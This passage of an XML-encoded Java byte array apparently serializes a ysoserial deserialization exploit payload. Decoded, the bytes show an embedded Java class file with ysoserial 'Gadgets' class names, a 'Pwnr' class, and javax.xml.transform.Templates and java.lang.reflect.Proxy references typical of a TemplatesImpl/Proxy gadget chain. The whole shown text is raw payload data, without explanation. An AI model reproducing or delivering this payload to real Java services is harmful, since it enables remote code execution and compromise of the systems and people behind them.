index=\"3992\"><byte>0</byte></void><void index=\"3993\"><byte>24</byte></void><void index=\"3994\"><byte>58</byte></void><void index=\"3995\"><byte>10</byte></void><void index=\"3996\"><byte>-78</byte></void><void index=\"3997\"><byte>0</byte></void><void index=\"3998\"><byte>-85</byte></void><void index=\"3999\"><byte>25</byte></void><void index=\"4000\"><byte>10</byte></void><void index=\"4001\"><byte>-74</byte></void><void index=\"4002\"><byte>0</byte></void><void index=\"4003\"><byte>-82</byte></void><void index=\"4004\"><byte>-74</byte></void><void index=\"4005\"><byte>0</byte></void><void index=\"4006\"><byte>-77</byte></void><void index=\"4007\"><byte>25</byte></void><void index=\"4008\"><byte>10</byte></void><void index=\"4009\"><byte>-74</byte></void><void index=\"4010\"><byte>0</byte></void><void index=\"4011\"><byte>-74</byte></void><void index=\"4012\"><byte>-89</byte></void><void index=\"4013\"><byte>0</byte></void><void index=\"4014\"><byte>3</byte></void><void index=\"4015\"><byte>-79</byte></void><void index=\"4016\"><byte>0</byte></void><void index=\"4017\"><byte>1</byte></void><void index=\"4018\"><byte>0</byte></void><void index=\"4019\"><byte>94</byte></void><void index=\"4020\"><byte>0</byte></void><void index=\"4021\"><byte>-7</byte></void><void index=\"4022\"><byte>0</byte></void><void index=\"4023\"><byte>-4</byte></void><void index=\"4024\"><byte>0</byte></void><void index=\"4025\"><byte>-89</byte></void><void index=\"4026\"><byte>0</byte></void><void index=\"4027\"><byte>1</byte></void><void index=\"4028\"><byte>0</byte></void><void index=\"4029\"><byte>-73</byte></void><void index=\"4030\"><byte>0</byte></void><void index=\"4031\"><byte>0</byte></void><void index=\"4032\"><byte>0</byte></void><void index=\"4033\"><byte>70</byte></void><void index=\"4034\"><byte>0</byte></void><void index=\"4035\"><byte>9</byte></void><void index=\"4036\"><byte>3</byte></void><void index=\"4037\"><byte>-1</byte></void><void index=\"4038\"><byte>0</byte></void><void index=\"4039\"><byte>109</byte></void><void index=\"4040\"><byte>0</byte></void><void index=\"4041\"><byte>6</byte></void><void index=\"4042\"><byte>0</byte></void><void index=\"4043\"><byte>5</byte></void><void index=\"4044\"><byte>7</byte></void><void index=\"4045\"><byte>0</byte></void><void index=\"4046\"><byte>112</byte></void><void index=\"4047\"><byte>7</byte></void><void index=\"4048\"><byte>0</byte></void><void index=\"4049\"><byte>69</byte></void><void index=\"4050\"><byte>7</byte></void><void index=\"4051\"><byte>0</byte></void><void index=\"4052\"><byte>96</byte></void><void index=\"4053\"><byte>7</byte></void><void index=\"4054\"><byte>0</byte></void><void index=\"4055\"><byte>112</byte></void><void index=\"4056\"><byte>0</byte></void><void index=\"4057\"><byte>0</byte></void><void index=\"4058\"><byte>2</byte></void><void index=\"4059\"><byte>29</byte></void><void index=\"4060\"><byte>-4</byte></void><void index=\"4061\"><byte>0</byte></void><void index=\"4062\"><byte>26</byte></void><void index=\"4063\"><byte>7</byte></void><void index=\"4064\"><byte>0</byte></void><void index=\"4065\"><byte>-115</byte></void><void index=\"4066\"><byte>-2</byte></void><void index=\"4067\"><byte>0</byte></void><void index=\"4068\"><byte>32</byte></void><void index=\"4069\"><byte>7</byte></void><void index=\"4070\"><byte>0</byte></void><void index=\"4071\"><byte>-119</byte></void><void index=\"4072\"><byte>7</byte></void><void index=\"4073\"><byte>0</byte></void><void index=\"4074\"><byte>112</byte></void><void index=\"4075\"><byte>7</byte></void><void index=\"4076\"><byte>0</byte></void><void index=\"4077\"><byte>112</byte></void><void index=\"4078\"><byte>21</byte></void><void index=\"4079\"><byte>-1</byte></void><void index=\"4080\"><byte>0</byte></void><void index=\"4081\"><byte>23</byte></void><void index=\"4082\"><byte>0</byte></void><void index=\"4083\"><byte>6</byte></void><void index=\"4084\"><byte>0</byte></void><void index=\"4085\"><byte>5</byte></void><void index=\"4086\"><byte>7</byte></void><void index=\"4087\"><byte>0</byte></void><void index=\"4088\"><byte>112</byte></void><void index=\"4089\"><byte>7</byte></void><void index=\"4090\"><byte>0</byte></void><void index=\"4091\"><byte>69</byte></void><void index=\"4092\"><byte>7</byte></void><void index=\"4093\"><byte>0</byte></void><void index=\"4094\"><byte>96</byte></void><void index=\"4095\"><byte>7</byte></void><void index=\"4096\"><byte>0</byte></void><void index=\"4097\"><byte>112</byte></void><void index=\"4098\"><byte>0</byte></void><void index=\"4099\"><byte>1</byte></void><void index=\"4100\"><byte>7</byte></void><void index=\"4101\"><byte>0</byte></void><void index=\"4102\"><byte>-89</byte></void><void index=\"4103\"><byte>20</byte></void><void index=\"4104\"><byte>0</byte></void><void index=\"4105\"><byte>2</byte></void><void index=\"4106\"><byte>0</byte></void><void index=\"4107\"><byte>32</byte></void><void index=\"4108\"><byte>0</byte></void><void index=\"4109\"><byte>0</byte></void><void index=\"4110\"><byte>0</byte></void><void index=\"4111\"><byte>2</byte></void><void index=\"4112\"><byte>0</byte></void><void index=\"4113\"><byte>33</byte></void><void index=\"4114\"><byte>0</byte></void><void index=\"4115\"><byte>17</byte></void><void index=\"4116\"><byte>0</byte></void><void index=\"4117\"><byte>0</byte></void><void index=\"4118\"><byte>0</byte></void><void index=\"4119\"><byte>10</byte></void><void index=\"4120\"><byte>0</byte></void><void index=\"4121\"><byte>1</byte></void><void index=\"4122\"><byte>0</byte></void><void index=\"4123\"><byte>2</byte></void><void index=\"4124\"><byte>0</byte></void><void index=\"4125\"><byte>35</byte></void><void index=\"4126\"><byte>0</byte></void><void index=\"4127\"><byte>16</byte></void><void index=\"4128\"><byte>0</byte></void><void index=\"4129\"><byte>9</byte></void><void index=\"4130\"><byte>117</byte></void><void index=\"4131\"><byte>113</byte></void><void index=\"4132\"><byte>0</byte></void><void index=\"4133\"><byte>126</byte></void><void index=\"4134\"><byte>0</byte></void><void index=\"4135\"><byte>13</byte></void><void index=\"4136\"><byte>0</byte></void><void index=\"4137\"><byte>0</byte></void><void index=\"4138\"><byte>1</byte></void><void index=\"4139\"><byte>-44</byte></void><void index=\"4140\"><byte>-54</byte></void><void index=\"4141\"><byte>-2</byte></void><void index=\"4142\"><byte>-70</byte></void><void index=\"4143\"><byte>-66</byte></void><void index=\"4144\"><byte>0</byte></void><void index=\"4145\"><byte>0</byte></void><void index=\"4146\"><byte>0</byte></void><void index=\"4147\"><byte>50</byte></void><void index=\"4148\"><byte>0</byte></void><void index=\"4149\"><byte>27</byte></void><void index=\"4150\"><byte>10</byte></void><void index=\"4151\"><byte>0</byte></void><void index=\"4152\"><byte>3</byte></void><void index=\"4153\"><byte>0</byte></void><void index=\"4154\"><byte>21</byte></void><void index=\"4155\"><byte>7</byte></void><void index=\"4156\"><byte>0</byte></void><void index=\"4157\"><byte>23</byte></void><void index=\"4158\"><byte>7</byte></void><void index=\"4159\"><byte>0</byte></void><void index=\"4160\"><byte>24</byte></void><void index=\"4161\"><byte>7</byte></void><void index=\"4162\"><byte>0</byte></void><void index=\"4163\"><byte>25</byte></void><void index=\"4164\"><byte>1</byte></void><void index=\"4165\"><byte>0</byte></void><void index=\"4166\"><byte>16</byte></void><void index=\"4167\"><byte>115</byte></void><void index=\"4168\"><byte>101</byte></void><void index=\"4169\"><byte>114</byte></void><void index=\"4170\"><byte>105</byte></void><void index=\"4171\"><byte>97</byte></void><void index=\"4172\"><byte>108</byte></void><void index=\"4173\"><byte>86</byte></void><void index=\"4174\"><byte>101</byte></void><void index=\"4175\"><byte>114</byte></void><void index=\"4176\"><byte>115</byte></void><void index=\"4177\"><byte>105</byte></void><void index=\"4178\"><byte>111</byte></void><void index=\"4179\"><byte>110</byte></void><void index=\"4180\"><byte>85</byte></void><void index=\"4181\"><byte>73</byte></void><void index=\"4182\"><byte>68</byte></void><void index=\"4183\"><byte>1</byte></void><void index=\"4184\"><byte>0</byte></void><void index=\"4185\"><byte>1</byte></void><void index=\"4186\"><byte>74</byte></void><void index=\"4187\"><byte>1</byte></void><void index=\"4188\"><byte>0</byte></void><void index=\"4189\"><byte>13</byte></void><void index=\"4190\"><byte>67</byte></void><void index=\"4191\"><byte>111</byte></void><void index=\"4192\"><byte>110</byte></void><void index=\"4193\"><byte>115</byte></void><void index=\"4194\"><byte>116</byte></void><void index=\"4195\"><byte>97</byte></void><void index=\"4196\"><byte>110</byte></void><void index=\"4197\"><byte>116</byte></void><void index=\"4198\"><byte>86</byte></void><void index=\"4199\"><byte>97</byte></void><void index=\"4200\"><byte>108</byte></void><void index=\"4201\"><byte>117</byte></void><void index=\"4202\"><byte>101</byte></void><void index=\"4203\"><byte>5</byte></void><void index=\"4204\"><byte>113</byte></void><void index=\"4205\"><byte>-26</byte></void><void index=\"4206\"><byte>105</byte></void><void index=\"4207\"><byte>-18</byte></void><void index=\"4208\"><byte>60</byte></void><void index=\"4209\"><byte>109</byte></void><void index=\"4210\"><byte>71</byte></void><void index=\"4211\"><byte>24</byte></void><void index=\"4212\"><byte>1</byte></void><void index=\"4213\"><byte>0</byte></void><void index=\"4214\"><byte>6</byte></void><void index=\"4215\"><byte>60</byte></void><void index=\"4216\"><byte>105</byte></void><void index=\"4217\"><byte>110</byte></void><void index=\"4218\"><byte>105</byte></void><void index=\"4219\"><byte>116</byte></void><void index=\"4220\"><byte>62</byte></void><void index=\"4221\"><byte>1</byte></void><void index=\"4222\"><byte>0</byte></void><void index=\"4223\"><byte>3</byte></void><void index=\"4224\"><byte>40</byte></void><void index=\"4225\"><byte>41</byte></void><void index=\"4226\"><byte>86</byte></void><void index=\"4227\"><byte>1</byte></void><void index=\"4228\"><byte>0</byte></void><void index=\"4229\"><byte>4</byte></void><void index=\"4230\"><byte>67</byte></void><void index=\"4231\"><byte>111</byte></void><void index=\"4232\"><byte>100</byte></void><void index=\"4233\"><byte>101</byte></void><void index=\"4234\"><byte>1</byte></void><void index=\"4235\"><byte>0</byte></void><void index=\"4236\"><byte>15</byte></void><void index=\"4237\"><byte>76</byte></void><void index=\"4238\"><byte>105</byte></void><void index=\"4239\"><byte>110</byte></void><void index=\"4240\"><byte>101</byte></void><void index=\"4241\"><byte>78</byte></void><void index=\"4242\"><byte>117</byte></void><void index=\"4243\"><byte>109</byte></void><void index=\"4244\"><byte>98</byte></void><void index=\"4245\"><byte>101</byte></void><void index=\"4246\"><byte>114</byte></void><void index=\"4247\"><byte>84</byte></void><void index=\"4248\"><byte>97</byte></void><void index=\"4249\"><byte>98</byte></void><void index=\"4250\"><byte>108</byte></void><void index=\"4251\"><byte>101</byte></void><void index=\"4252\"><byte>1</byte></void><void index=\"4253\"><byte>0</byte></void><void index=\"4254\"><byte>18</byte></void><void index=\"4255\"><byte>76</byte></void><void index=\"4256\"><byte>111</byte></void><void index=\"4257\"><byte>99</byte></void><void index=\"4258\"><byte>97</byte></void><void index=\"4259\"><byte>108</byte></void><void index=\"4260\"><byte>86</byte></void><void index=\"4261\"><byte>97</byte></void><void index=\"4262\"><byte>114</byte></void><void index=\"4263\"><byte>105</byte></void><void index=\"4264\"><byte>97</byte></void><void index=\"4265\"><byte>98</byte></void><void index=\"4266\"><byte>108</byte></void><void index=\"4267\"><byte>101</byte></void><void index=\"4268\"><byte>84</byte></void><void index=\"4269\"><byte>97</byte></void><void index=\"4270\"><byte>98</byte></void><void index=\"4271\"><byte>108</byte></void><void index=\"4272\"><byte>101</byte></void><void index=\"4273\"><byte>1</byte></void><void index=\"4274\"><byte>0</byte></void><void index=\"4275\"><byte>4</byte></void><void index=\"4276\"><byte>116</byte></void><void index=\"4277\"><byte>104</byte></void><void index=\"4278\"><byte>105</byte></void><void index=\"4279\"><byte>115</byte></void><void index=\"4280\"><byte>1</byte></void><void index=\"4281\"><byte>0</byte></void><void index=\"4282\"><byte>3</byte></void><void index=\"4283\"><byte>70</byte></void><void index=\"4284\"><byte>111</byte></void><void index=\"4285\"><byte>111</byte></void><void index=\"4286\"><byte>1</byte></void><void index=\"4287\"><byte>0</byte></void><void index=\"4288\"><byte>12</byte></void><void index=\"4289\"><byte>73</byte></void><void index=\"4290\"><byte>110</byte></void><void index=\"4291\"><byte>110</byte></void><void index=\"4292\"><byte>101</byte></void><void index=\"4293\"><byte>114</byte></void><void index=\"4294\"><byte>67</byte></void><void index=\"4295\"><byte>108</byte></void><void index=\"4296\"><byte>97</byte></void><void index=\"4297\"><byte>115</byte></void><void index=\"4298\"><byte>115</byte></void><void index=\"4299\"><byte>101</byte></void><void index=\"4300\"><byte>115</byte></void><void index=\"4301\"><byte>1</byte></void><void index=\"4302\"><byte>0</byte></void><void index=\"4303\"><byte>37</byte></void><void index=\"4304\"><byte>76</byte></void><void index=\"4305\"><byte>121</byte></void><void index=\"4306\"><byte>115</byte></void><void index=\"4307\"><byte>111</byte></void><void index=\"4308\"><byte>115</byte></void><void index=\"4309\"><byte>101</byte></void><void index=\"4310\"><byte>114</byte></void><void index=\"4311\"><byte>105</byte></void><void index=\"4312\"><byte>97</byte></void><void index=\"4313\"><byte>108</byte></void><void index=\"4314\"><byte>47</byte></void><void index=\"4315\"><byte>112</byte></void><void index=\"4316\"><byte>97</byte></void><void index=\"4317\"><byte>121</byte></void><void index=\"4318\"><byte>108</byte></void><void index=\"4319\"><byte>111</byte></void><void index=\"4320\"><byte>97</byte></void><void index=\"4321\"><byte>100</byte></void><void index=\"4322\"><byte>115</byte></void><void index=\"4323\"><byte>47</byte></void><void index=\"4324\"><byte>117</byte></void><void index=\"4325\"><byte>116</byte></void><void index=\"4326\"><byte>105</byte></void><void index=\"4327\"><byte>108</byte></void><void index=\"4328\"><byte>47</byte></void><void index=\"4329\"><byte>71</byte></void><void index=\"4330\"><byte>97</byte></void><void index=\"4331\"><byte>100</byte></void><void index=\"4332\"><byte>103</byte></void><void index=\"4333\"><byte>101</byte></void><void index=\"4334\"><byte>116</byte></void><void index=\"4335\"><byte>115</byte></void><void index=\"4336\"><byte>36</byte></void><void index=\"4337\"><byte>70</byte></void><void index=\"4338\"><byte>111</byte></void><void index=\"4339\"><byte>111</byte></void><void index=\"4340\"><byte>59</byte></void><void index=\"4341\"><byte>1</byte></void><void index=\"4342\"><byte>0</byte></void><void index=\"4343\"><byte>10</byte></void><void index=\"4344\"><byte>83</byte></void><void index=\"4345\"><byte>111</byte></void><void index=\"4346\"><byte>117</byte></void><void index=\"4347\"><byte>114</byte></void><void index=\"4348\"><byte>99</byte></void><void index=\"4349\"><byte>101</byte></void><void index=\"4350\"><byte>70</byte></void><void index=\"4351\"><byte>105</byte></void><void index=\"4352\"><byte>108</byte></void><void index=\"4353\"><byte>101</byte></void><void index=\"4354\"><byte>1</byte></void><void index=\"4355\"><byte>0</byte></void><void index=\"4356\"><byte>12</byte></void><void index=\"4357\"><byte>71</byte></void><void index=\"4358\"><byte>97</byte></void><void index=\"4359\"><byte>100</byte></void><void index=\"4360\"><byte>103</byte></void><void index=\"4361\"><byte>101</byte></void><void index=\"4362\"><byte>116</byte></void><void index=\"4363\"><byte>115</byte></void><void index=\"4364\"><byte>46</byte></void><void index=\"4365\"><byte>106</byte></void><void index=\"4366\"><byte>97</byte></void><void index=\"4367\"><byte>118</byte></void><void index=\"4368\"><byte>97</byte></void><void index=\"4369\"><byte>12</byte></void><void index=\"4370\"><byte>0</byte></void><void index=\"4371\"><byte>10</byte></void><void index=\"4372\"><byte>0</byte></void><void index=\"4373\"><byte>11</byte></void><void index=\"4374\"><byte>7</byte></void><void index=\"4375\"><byte>0</byte></void><void index=\"4376\"><byte>26</byte></void><void index=\"4377\"><byte>1</byte></void><void index=\"4378\"><byte>0</byte></void><void index=\"4379\"><byte>35</byte></void><void index=\"4380\"><byte>121</byte></void><void index=\"4381\"><byte>115</byte></void><void index=\"4382\"><byte>111</byte></void><void index=\"4383\"><byte>115</byte></void><void index=\"4384\"><byte>101</byte></void><void index=\"4385\"><byte>114</byte></void><void index=\"4386\"><byte>105</byte></void><void index=\"4387\"><byte>97</byte></void><void index=\"4388\"><byte>108</byte></void><void index=\"4389\"><byte>47</byte></void><void index=\"4390\"><byte>112</byte></void><void index=\"4391\"><byte>97</byte></void><void index=\"4392\"><byte>121</byte></void><void index=\"4393\"><byte>108</byte></void><void index=\"4394\"><byte>111</byte></void><void index=\"4395\"><byte>97</byte></void><void index=\"4396\"><byte>100</byte></void><void index=\"4397\"><byte>115</byte></void><void index=\"4398\"><byte>47</byte></void><void index=\"4399\"><byte>117</byte></void><void index=\"4400\"><byte>116</byte></void><void index=\"4401\"><byte>105</byte></void><void index=\"4402\"><byte>108</byte></void><void index=\"4403\"><byte>47</byte></void><void index=\"4404\"><byte>71</byte></void><void index=\"4405\"><byte>97</byte></void><void index=\"4406\"><byte>100</byte></void><void index=\"4407\"><byte>103</byte></void><void index=\"4408\"><byte>101</byte></void><void index=\"4409\"><byte>116</byte></void><void index=\"4410\"><byte>115</byte></void><void index=\"4411\"><byte>36</byte></void><void index=\"4412\"><byte>70</byte></void><void index=\"4413\"><byte>111</byte></void><void index=\"4414\"><byte>111</byte></void><void index=\"4415\"><byte>1</byte></void><void index=\"4416\"><byte>0</byte></void><void index=\"4417\"><byte>16</byte></void><void index=\"4418\"><byte>106</byte></void><void index=\"4419\"><byte>97</byte></void><void index=\"4420\"><byte>118</byte></void><void index=\"4421\"><byte>97</byte></void><void index=\"4422\"><byte>47</byte></void><void index=\"4423\"><byte>108</byte></void><void index=\"4424\"><byte>97</byte></void><void index=\"4425\"><byte>110</byte></void><void index=\"4426\"><byte>103</byte></void><void index=\"4427\"><byte>47</byte></void><void index=\"4428\"><byte>79</byte></void><void index=\"4429\"><byte>98</byte></void><void index=\"4430\"><byte>106</byte></void><void index=\"4431\"><byte>101</byte></void><void index=\"4432\"><byte>99</byte></void><void index=\"4433\"><byte>116</byte></void><void index=\"4434\"><byte>1</byte></void><void index=\"4435\"><byte>0</byte></void><void index=\"4436\"><byte>20</byte></void><void index=\"4437\"><byte>106</byte></void><void index=\"4438\"><byte>97</byte></void><void index=\"4439\"><byte>118</byte></void><void index=\"4440\"><byte>97</byte></void><void index=\"4441\"><byte>47</byte></void><void index=\"4442\"><byte>105</byte></void><void index=\"4443\"><byte>111</byte></void><void index=\"4444\"><byte>47</byte></void><void index=\"4445\"><byte>83</byte></void><void index=\"4446\"><byte>101</byte></void><void index=\"4447\"><byte>114</byte></void><void index=\"4448\"><byte>105</byte></void><void index=\"4449\"><byte>97</byte></void><void index=\"4450\"><byte>108</byte></void><void index=\"4451\"><byte>105</byte></void><void index=\"4452\"><byte>122</byte></void><void index=\"4453\"><byte>97</byte></void><void index=\"4454\"><byte>98</byte></void><void index=\"4455\"><byte>108</byte></void><void index=\"4456\"><byte>101</byte></void><void index=\"4457\"><byte>1</byte></void><void index=\"4458\"><byte>0</byte></void><void index=\"4459\"><byte>31</byte></void><void index=\"4460\"><byte>121</byte></void><void index=\"4461\"><byte>115</byte></void><void index=\"4462\"><byte>111</byte></void><void index=\"4463\"><byte>115</byte></void><void index=\"4464\"><byte>101</byte></void><void index=\"4465\"><byte>114</byte></void><void index=\"4466\"><byte>105</byte></void><void index=\"4467\"><byte>97</byte></void><void index=\"4468\"><byte>108</byte></void><void index=\"4469\"><byte>47</byte></void><void index=\"4470\"><byte>112</byte></void><void index=\"4471\"><byte>97</byte></void><void index=\"4472\"><byte>121</byte></void><void index=\"4473\"><byte>108</byte></void><void index=\"4474\"><byte>111</byte></void><void index=\"4475\"><byte>97</byte></void><void index=\"4476\"><byte>100</byte></void><void index=\"4477\"><byte>115</byte></void><void index=\"4478\"><byte>47</byte></void><void index=\"4479\"><byte>117</byte></void><void index=\"4480\"><byte>116</byte></void><void index=\"4481\"><byte>105</byte></void><void index=\"4482\"><byte>108</byte></void><void index=\"4483\"><byte>47</byte></void><void index=\"4484\"><byte>71</byte></void><void index=\"4485\"><byte>97</byte></void><void index=\"4486\"><byte>100</byte></void><void index=\"4487\"><byte>103</byte></void><void index=\"4488\"><byte>101</byte></void><void index=\"4489\"><byte>116</byte></void><void index=\"4490\"><byte>115</byte></void><void index=\"4491\"><byte>0</byte></void><void index=\"4492\"><byte>33</byte></void><void index=\"4493\"><byte>0</byte></void><void index=\"4494\"><byte>2</byte></void><void index=\"4495\"><byte>0</byte></void><void index=\"4496\"><byte>3</byte></void><void index=\"4497\"><byte>0</byte></void><void index=\"4498\"><byte>1</byte></void><void index=\"4499\"><byte>0</byte></void><void index=\"4500\"><byte>4</byte></void><void index=\"4501\"><byte>0</byte></void><void index=\"4502\"><byte>1</byte></void><void index=\"4503\"><byte>0</byte></void><void index=\"4504\"><byte>26</byte></void><void index=\"4505\"><byte>0</byte></void><void index=\"4506\"><byte>5</byte></void><void index=\"4507\"><byte>0</byte></void><void index=\"4508\"><byte>6</byte></void><void index=\"4509\"><byte>0</byte></void><void index=\"4510\"><byte>1</byte></void><void index=\"4511\"><byte>0</byte></void><void index=\"4512\"><byte>7</byte></void><void index=\"4513\"><byte>0</byte></void><void index=\"4514\"><byte>0</byte></void><void index=\"4515\"><byte>0</byte></void><void index=\"4516\"><byte>2</byte></void><void index=\"4517\"><byte>0</byte></void><void index=\"4518\"><byte>8</byte></void><void index=\"4519\"><byte>0</byte></void><void index=\"4520\"><byte>1</byte></void><void index=\"4521\"><byte>0</byte></void><void index=\"4522\"><byte>1</byte></void><void index=\"4523\"><byte>0</byte></void><void index=\"4524\"><byte>10</byte></void><void index=\"4525\"><byte>0</byte></void><void index=\"4526\"><byte>11</byte></void><void index=\"4527\"><byte>0</byte></void><void index=\"4528\"><byte>1</byte></void><void index=\"4529\"><byte>0</byte></void><void index=\"4530\"><byte>12</byte></void><void index=\"4531\"><byte>0</byte></void><void index=\"4532\"><byte>0</byte></void><void index=\"4533\"><byte>0</byte></void><void index=\"4534\"><byte>47</byte></void><void index=\"4535\"><byte>0</byte></void><void index=\"4536\"><byte>1</byte></void><void index=\"4537\"><byte>0</byte></void><void index=\"4538\"><byte>1</byte></void><void index=\"4539\"><byte>0</byte></void><void index=\"4540\"><byte>0</byte></void><void index=\"4541\"><byte>0</byte></void><void index=\"4542\"><byte>5</byte></void><void index=\"4543\"><byte>42</byte></void><void index=\"4544\"><byte>-73</byte></void><void index=\"4545\"><byte>0</byte></void><void index=\"4546\"><byte>1</byte></void><void index=\"4547\"><byte>-79</byte></void><void index=\"4548\"><byte>0</byte></void><void index=\"4549\"><byte>0</byte></void><void index=\"4550\"><byte>0</byte></void><void index=\"4551\"><byte>2</byte></void><void index=\"4552\"><byte>0</byte></void><void index=\"4553\"><byte>13</byte></void><void index=\"4554\"><byte>0</byte></void><void index=\"4555\"><byte>0</byte></void><void index=\"4556\"><byte>0</byte></void><void index=\"4557\"><byte>6</byte></void><void index=\"4558\"><byte>0</byte></void><void index=\"4559\"><byte>1</byte></void><void index=\"4560\"><byte>0</byte></void><void index=\"4561\"><byte>0</byte></void><void index=\"4562\"><byte>0</byte></void><void index=\"4563\"><byte>60</byte></void><void index=\"4564\"><byte>0</byte></void><void index=\"4565\"><byte>14</byte></void><void index=\"4566\"><byte>0</byte></void><void index=\"4567\"><byte>0</byte></void><void index=\"4568\"><byte>0</byte></void><void index=\"4569\"><byte>12</byte></void><void index=\"4570\"><byte>0</byte></void><void index=\"4571\"><byte>1</byte></void><void index=\"4572\"><byte>0</byte></void><void index=\"4573\"><byte>0</byte></void><void index=\"4574\"><byte>0</byte></void><void index=\"4575\"><byte>5</byte></void><void index=\"4576\"><byte>0</byte></void><void index=\"4577\"><byte>15</byte></void><void index=\"4578\"><byte>0</byte></void><void index=\"4579\"><byte>18</byte></void><void index=\"4580\"><byte>0</byte></void><void index=\"4581\"><byte>0</byte></void><void index=\"4582\"><byte>0</byte></void><void index=\"4583\"><byte>2</byte></void><void index=\"4584\"><byte>0</byte></void><void index=\"4585\"><byte>19</byte></void><void index=\"4586\"><byte>0</byte></void><void index=\"4587\"><byte>0</byte></void><void index=\"4588\"><byte>0</byte></void><void index=\"4589\"><byte>2</byte></void><void index=\"4590\"><byte>0</byte></void><void index=\"4591\"><byte>20</byte></void><void index=\"4592\"><byte>0</byte></void><void index=\"4593\"><byte>17</byte></void><void index=\"4594\"><byte>0</byte></void><void index=\"4595\"><byte>0</byte></void><void index=\"4596\"><byte>0</byte></void><void index=\"4597\"><byte>10</byte></void><void index=\"4598\"><byte>0</byte></void><void index=\"4599\"><byte>1</byte></void><void index=\"4600\"><byte>0</byte></void><void index=\"4601\"><byte>2</byte></void><void index=\"4602\"><byte>0</byte></void><void index=\"4603\"><byte>22</byte></void><void index=\"4604\"><byte>0</byte></void><void index=\"4605\"><byte>16</byte></void><void index=\"4606\"><byte>0</byte></void><void index=\"4607\"><byte>9</byte></void><void index=\"4608\"><byte>112</byte></void><void index=\"4609\"><byte>116</byte></void><void index=\"4610\"><byte>0</byte></void><void index=\"4611\"><byte>4</byte></void><void index=\"4612\"><byte>80</byte></void><void index=\"4613\"><byte>119</byte></void><void index=\"4614\"><byte>110</byte></void><void index=\"4615\"><byte>114</byte></void><void index=\"4616\"><byte>112</byte></void><void index=\"4617\"><byte>119</byte></void><void index=\"4618\"><byte>1</byte></void><void index=\"4619\"><byte>0</byte></void><void index=\"4620\"><byte>120</byte></void><void index=\"4621\"><byte>115</byte></void><void index=\"4622\"><byte>125</byte></void><void index=\"4623\"><byte>0</byte></void><void index=\"4624\"><byte>0</byte></void><void index=\"4625\"><byte>0</byte></void><void index=\"4626\"><byte>1</byte></void><void index=\"4627\"><byte>0</byte></void><void index=\"4628\"><byte>29</byte></void><void index=\"4629\"><byte>106</byte></void><void index=\"4630\"><byte>97</byte></void><void index=\"4631\"><byte>118</byte></void><void index=\"4632\"><byte>97</byte></void><void index=\"4633\"><byte>120</byte></void><void index=\"4634\"><byte>46</byte></void><void index=\"4635\"><byte>120</byte></void><void index=\"4636\"><byte>109</byte></void><void index=\"4637\"><byte>108</byte></void><void index=\"4638\"><byte>46</byte></void><void index=\"4639\"><byte>116</byte></void><void index=\"4640\"><byte>114</byte></void><void index=\"4641\"><byte>97</byte></void><void index=\"4642\"><byte>110</byte></void><void index=\"4643\"><byte>115</byte></void><void index=\"4644\"><byte>102</byte></void><void index=\"4645\"><byte>111</byte></void><void index=\"4646\"><byte>114</byte></void><void index=\"4647\"><byte>109</byte></void><void index=\"4648\"><byte>46</byte></void><void index=\"4649\"><byte>84</byte></void><void index=\"4650\"><byte>101</byte></void><void index=\"4651\"><byte>109</byte></void><void index=\"4652\"><byte>112</byte></void><void index=\"4653\"><byte>108</byte></void><void index=\"4654\"><byte>97</byte></void><void index=\"4655\"><byte>116</byte></void><void index=\"4656\"><byte>101</byte></void><void index=\"4657\"><byte>115</byte></void><void index=\"4658\"><byte>120</byte></void><void index=\"4659\"><byte>114</byte></void><void index=\"4660\"><byte>0</byte></void><void index=\"4661\"><byte>23</byte></void><void index=\"4662\"><byte>106</byte></void><void index=\"4663\"><byte>97</byte></void><void index=\"4664\"><byte>118</byte></void><void index=\"4665\"><byte>97</byte></void><void index=\"4666\"><byte>46</byte></void><void index=\"4667\"><byte>108</byte></void><void index=\"4668\"><byte>97</byte></void><void index=\"4669\"><byte>110</byte></void><void index=\"4670\"><byte>103</byte></void><void index=\"4671\"><byte>46</byte></void><void index=\"4672\"><byte>114</byte></void><void index=\"4673\"><byte>101</byte></void><void index=\"4674\"><byte>102</byte></void><void index=\"4675\"><byte>108</byte></void><void index=\"4676\"><byte>101</byte></void><void index=\"4677\"><byte>99</byte></void><void index=\"4678\"><byte>116</byte></void><void index=\"4679\"><byte>46</byte></void><void index=\"4680\"><byte>80</byte></void><void index=\"4681\"><byte>114</byte></void><void index=\"4682\"><byte>111</byte></void><void index=\"4683\"><byte>120</byte></void><void index=\"4684\"><byte>121</byte></void><void index=\"4685\"><byte>-31</byte></void><void index=\"4686\"><byte>39</byte></void><void index=\"4687\"><byte>-38</byte></void><void index=\"4688\"><byte>32</byte></void><void index=\"4689\"><byte>-52</byte></void><void index=\"4690\"><byte>16</byte></void><void index=\"4691\"><byte>67</byte></void><void index=\"4692\"><byte>-53</byte></void><void index=\"4693\"><byte>2</byte></void><void index=\"4694\"><byte>0</byte></void><void index=\"4695\"><byte>1</byte></void><void index=\"4696\"><byte>76</byte></void><void index=\"4697\"><byte>0</byte></void><void index=\"4698\"><byte>1</byte></void><void index=\"4699\"><byte>104</byte></void><void index=\"4700\"><byte>116</byte></void><void index=\"4701\"><byte>0</byte></void><void index=\"4702\"><byte>37</byte></void><void index=\"4703\"><byte>76</byte></void><void index=\"4704\"><byte>106</byte></void><void index=\"4705\"><byte>97</byte></void><void index=\"4706\"><byte>118</byte></void><void index=\"4707\"><byte>97</byte></void><void index=\"4708\"><byte>47</byte></void><void index=\"4709\"><byte>108</byte></void><void index=\"4710\"><byte>97</byte></void><void index=\"4711\"><byte>110</byte></void><void index=\"4712\"><byte>103</byte></void><void index=\"4713\"><byte>47</byte></void><void index=\"4714\"><byte>114</byte></void><void index=\"4715\"><byte>101</byte></void><void index=\"4716\"><byte>102</byte></void><void index=\"4717\"><byte>108</byte></void><void index=\"4718\"><byte>101</byte></void><void index=\"4719\"><byte>99</byte></void><void index=\"4720\"><byte>116</byte></void><void index=\"4721\"><byte>47</byte></void><void index=\"4722\"><byte>73</byte></void><void index=\"4723\"><byte>110</byte></void><void index=\"4724\"><byte>118</byte></void><void index=\"4725\"><byte>111</byte></void><void index=\"4726\"><byte>99</byte></void><void index=\"4727\"><byte>97</byte></void><void index=\"4728\"><byte>116</byte></void><void index=\"4729\"><byte>105</byte></void><void index=\"4730\"><byte>111</byte></void><void index=\"4731\"><byte>110</byte></void><void index=\"4732\"><byte>72</byte></void><void index=\"4733\"><byte>97</byte></void><void index=\"4734\"><byte>110</byte></void><void index=\"4735\"><byte>100</byte></void><void index=\"4736\"><byte>108</byte></void><void index=\"4737\"><byte>101</byte></void><void index=\"4738\"><byte>114</byte></void><void index=\"4739\"><byte>59</byte></void><void 